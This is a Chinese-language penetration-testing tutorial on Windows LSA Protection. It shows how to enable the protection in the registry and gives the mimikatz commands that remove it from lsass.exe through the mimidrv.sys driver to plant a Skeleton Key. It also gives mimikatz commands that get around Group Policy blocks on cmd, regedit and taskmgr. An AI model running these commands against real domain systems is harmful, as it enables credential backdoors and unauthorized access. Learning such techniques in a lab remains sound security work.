域渗透-LSA Protection

简介：

微软在 2014 年 3 月 12 日添加了 LSA 保护策略，用来防止对进程 lsass.exe 的代码注入，这样一来就无法使用 mimikatz 对 lsass.exe 进行注入，相关操作也会失败。

微软官方文档： https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn408187(v=ws.11)

 

适用系统：

Windows 8.1

Windows Server 2012 R2

 

接下来换用 Windows Server 2012 R2 进行测试

（1）配置 LSA Protection

注册表位置：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

新建-DWORD（32）值，名称为 RunAsPPL,数值为 00000001，重启系统生效。

 

（2）测试 Skeleton Key

mimikatz 命令：

privilege::debug

misc::skeleton

未配置LSA Protection时不会报错。

配置LSA Protection时失败报错：

 

（3）绕过 LSA Protection

mimikatz 早在 2013 年 10 月就已支持绕过 LSA Protection

 

注：该功能需要 mimidrv.sys 文件

 

mimikatz 命令：

privilege::debug

!+

!processprotect /process:lsass.exe /remove

misc::skeleton

如图，导入驱动文件mimidrv.sys后，绕过 LSA Protection，操作成功

关闭LSA Protection，将RunAsPPL的值改为0重启计算机即可。

 

3.补充

一些常见问题的解决方法，管理员常常会禁用一些重要程序的运行，比如 cmd、regedit、taskmgr等

1、如何禁用 cmd、regedit、taskmgr

输入 gpedit.msc 进入本地组策略编辑器

本地计算机策略-用户配置-管理模板-系统

 

禁用 cmd：

选择"阻止访问命令提示符"-编辑---启用

组织命令提示符启用。

测试：命令提示符已被管理员停用。

 

禁用 regedit：

选择阻止访问注册表编辑工具"-编辑-启用

禁用 Windows 注册表编辑器 Regedit.exe。

测试：注册表编辑器已被管理员禁用。

 

禁用 taskmgr:

选择"不要运行指定的 Windows 应用程序"-不允许的应用程序列表-填入 taskmgr.exe-启用。

防止 Windows 运行在此设置中指定的程序。

测试：用户无法运行已添加到不允许的应用程序列表的程序。

经测试 cmd、regedit、taskmgr 均已被禁用。

 

2、绕过

mimikatz 命令：

privilege::debug

misc::cmd

misc::regedit

misc::taskmgr

 

 

成功执行，绕过限制。

 

做自己想做的，不要活给别人看。